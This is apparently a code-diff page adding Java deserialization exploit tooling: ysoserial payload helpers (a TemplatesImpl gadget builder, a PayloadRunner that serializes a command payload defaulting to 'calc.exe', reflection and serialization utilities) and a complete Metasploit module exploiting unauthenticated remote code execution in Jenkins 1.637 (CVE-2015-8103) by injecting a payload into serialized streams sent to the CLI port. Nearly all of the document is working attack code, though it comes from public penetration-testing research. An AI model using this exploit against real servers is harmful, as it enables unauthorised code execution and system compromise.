Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
|
||||
classBytes,
|
||||
ClassFiles.classAsBytes(Foo.class)});
|
||||
|
||||
// required to make TemplatesImpl happy
|
||||
Reflections.setFieldValue(templates, "_name", "Pwnr");
|
||||
Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
|
||||
return templates;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,40 @@
|
|||
package ysoserial.payloads.util;
|
||||
|
||||
import static ysoserial.payloads.util.Serializables.deserialize;
|
||||
import static ysoserial.payloads.util.Serializables.serialize;
|
||||
|
||||
import java.util.concurrent.Callable;
|
||||
|
||||
import ysoserial.ExecBlockingSecurityManager;
|
||||
import ysoserial.payloads.ObjectPayload;
|
||||
|
||||
/*
|
||||
* utility class for running exploits locally from command line
|
||||
*/
|
||||
@SuppressWarnings("unused")
|
||||
public class PayloadRunner {
|
||||
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
|
||||
// ensure payload generation doesn't throw an exception
|
||||
byte[] serialized = ExecBlockingSecurityManager.wrap(new Callable<byte[]>(){
|
||||
public byte[] call() throws Exception {
|
||||
final String command = args.length > 0 && args[0] != null ? args[0] : "calc.exe";
|
||||
|
||||
System.out.println("generating payload object(s) for command: '" + command + "'");
|
||||
|
||||
final Object objBefore = clazz.newInstance().getObject(command);
|
||||
|
||||
System.out.println("serializing payload");
|
||||
|
||||
return serialize(objBefore);
|
||||
}});
|
||||
|
||||
try {
|
||||
System.out.println("deserializing payload");
|
||||
final Object objAfter = deserialize(serialized);
|
||||
} catch (Exception e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,33 @@
|
|||
package ysoserial.payloads.util;
|
||||
|
||||
import java.lang.reflect.Constructor;
|
||||
import java.lang.reflect.Field;
|
||||
|
||||
public class Reflections {
|
||||
|
||||
public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
|
||||
Field field = clazz.getDeclaredField(fieldName);
|
||||
if (field == null && clazz.getSuperclass() != null) {
|
||||
field = getField(clazz.getSuperclass(), fieldName);
|
||||
}
|
||||
field.setAccessible(true);
|
||||
return field;
|
||||
}
|
||||
|
||||
public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
|
||||
final Field field = getField(obj.getClass(), fieldName);
|
||||
field.set(obj, value);
|
||||
}
|
||||
|
||||
public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
|
||||
final Field field = getField(obj.getClass(), fieldName);
|
||||
return field.get(obj);
|
||||
}
|
||||
|
||||
public static Constructor<?> getFirstCtor(final String name) throws Exception {
|
||||
final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
|
||||
ctor.setAccessible(true);
|
||||
return ctor;
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,34 @@
|
|||
package ysoserial.payloads.util;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
import java.io.ObjectInputStream;
|
||||
import java.io.ObjectOutputStream;
|
||||
import java.io.OutputStream;
|
||||
|
||||
public class Serializables {
|
||||
|
||||
public static byte[] serialize(final Object obj) throws IOException {
|
||||
final ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||
serialize(obj, out);
|
||||
return out.toByteArray();
|
||||
}
|
||||
|
||||
public static void serialize(final Object obj, final OutputStream out) throws IOException {
|
||||
final ObjectOutputStream objOut = new ObjectOutputStream(out);
|
||||
objOut.writeObject(obj);
|
||||
}
|
||||
|
||||
public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
|
||||
final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
|
||||
return deserialize(in);
|
||||
}
|
||||
|
||||
public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
|
||||
final ObjectInputStream objIn = new ObjectInputStream(in);
|
||||
return objIn.readObject();
|
||||
}
|
||||
|
||||
}
|
|
@ -0,0 +1,213 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
|
||||
the Jenkins master, which allows remote arbitrary code execution. Authentication is not
|
||||
required to exploit this vulnerability.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Christopher Frohoff', # Vulnerability discovery
|
||||
'Steve Breen', # Public Exploit
|
||||
'Dev Mohanty', # Metasploit module
|
||||
'Louis Sato', # Metasploit
|
||||
'William Vu', # Metasploit
|
||||
'juan vazquez', # Metasploit
|
||||
'Wei Chen' # Metasploit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2015-8103'],
|
||||
['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
|
||||
['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
|
||||
['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
|
||||
['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
|
||||
],
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Jenkins 1.637', {} ]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 18 2015',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
|
||||
Opt::RPORT('8080')
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless vulnerable?
|
||||
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
|
||||
end
|
||||
invoke_remote_method(set_payload)
|
||||
invoke_remote_method(class_load_payload)
|
||||
end
|
||||
|
||||
def check
|
||||
result = Exploit::CheckCode::Safe
|
||||
|
||||
if vulnerable?
|
||||
result = Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
result
|
||||
end
|
||||
|
||||
def vulnerable?
|
||||
http_headers = send_request_cgi({'uri' => '/'}).headers
|
||||
if http_headers['X-Jenkins'].to_f <= 1.637
|
||||
@jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
|
||||
return true
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
# Connects to the server, creates a request, sends the request,
|
||||
# reads the response
|
||||
#
|
||||
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
|
||||
#
|
||||
def send_request_cgi(opts={}, timeout = 20)
|
||||
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
|
||||
actual_timeout = datastore['HttpClientTimeout']
|
||||
else
|
||||
actual_timeout = opts[:timeout] || timeout
|
||||
end
|
||||
|
||||
begin
|
||||
c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
|
||||
c.connect
|
||||
r = c.request_cgi(opts)
|
||||
c.send_recv(r, actual_timeout)
|
||||
rescue ::Errno::EPIPE, ::Timeout::Error
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def invoke_remote_method(serialized_java_stream)
|
||||
begin
|
||||
socket = connect(true, {'RPORT' => @jenkins_cli_port})
|
||||
|
||||
print_status 'Sending headers...'
|
||||
socket.put(read_bin_file('serialized_jenkins_header'))
|
||||
|
||||
vprint_status(socket.recv(1024))
|
||||
vprint_status(socket.recv(1024))
|
||||
|
||||
encoded_payload0 = read_bin_file('serialized_payload_header')
|
||||
encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
|
||||
encoded_payload2 = read_bin_file('serialized_payload_footer')
|
||||
|
||||
encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
|
||||
print_status "Sending payload length: #{encoded_payload.length}"
|
||||
socket.put(encoded_payload)
|
||||
ensure
|
||||
disconnect(socket)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def print_status(msg='')
|
||||
super("#{rhost}:#{rport} - #{msg}")
|
||||
end
|
||||
|
||||
#
|
||||
# Serialized stream generated with:
|
||||
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
|
||||
#
|
||||
def set_payload
|
||||
stream = Rex::Java::Serialization::Model::Stream.new
|
||||
|
||||
handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
|
||||
decoded = stream.decode(handle)
|
||||
handle.close
|
||||
|
||||
inject_payload_into_stream(decoded).encode
|
||||
end
|
||||
|
||||
#
|
||||
# Serialized stream generated with:
|
||||
# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
|
||||
#
|
||||
def class_load_payload
|
||||
stream = Rex::Java::Serialization::Model::Stream.new
|
||||
handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
|
||||
decoded = stream.decode(handle)
|
||||
handle.close
|
||||
inject_class_loader_into_stream(decoded).encode
|
||||
end
|
||||
|
||||
def inject_class_loader_into_stream(decoded)
|
||||
file_name_utf8 = get_array_chain(decoded)
|
||||
.values[2]
|
||||
.class_data[0]
|
||||
.values[1]
|
||||
.values[0]
|
||||
.values[0]
|
||||
.class_data[3]
|
||||
file_name_utf8.contents = get_random_file_name
|
||||
file_name_utf8.length = file_name_utf8.contents.length
|
||||
class_name_utf8 = get_array_chain(decoded)
|
||||
.values[4]
|
||||
.class_data[0]
|
||||
.values[0]
|
||||
class_name_utf8.contents = 'metasploit.Payload'
|
||||
class_name_utf8.length = class_name_utf8.contents.length
|
||||
decoded
|
||||
end
|
||||
|
||||
def get_random_file_name
|
||||
@random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
|
||||
end
|
||||
|
||||
def inject_payload_into_stream(decoded)
|
||||
byte_array = get_array_chain(decoded)
|
||||
.values[2]
|
||||
.class_data
|
||||
.last
|
||||
byte_array.values = payload.encoded.bytes
|
||||
file_name_utf8 = decoded.references[44].class_data[0]
|
||||
rnd_fname = get_random_file_name
|
||||
register_file_for_cleanup(rnd_fname)
|
||||
file_name_utf8.contents = rnd_fname
|
||||
file_name_utf8.length = file_name_utf8.contents.length
|
||||
decoded
|
||||
end
|
||||
|
||||
def get_array_chain(decoded)
|
||||
object = decoded.contents[0]
|
||||
lazy_map = object.class_data[1].class_data[0]
|
||||
chained_transformer = lazy_map.class_data[0]
|
||||
chained_transformer.class_data[0]
|
||||
end
|
||||
|
||||
def read_bin_file(bin_file_path)
|
||||
data = ''
|
||||
|
||||
File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
|
||||
data = f.read
|
||||
end
|
||||
|
||||
data
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue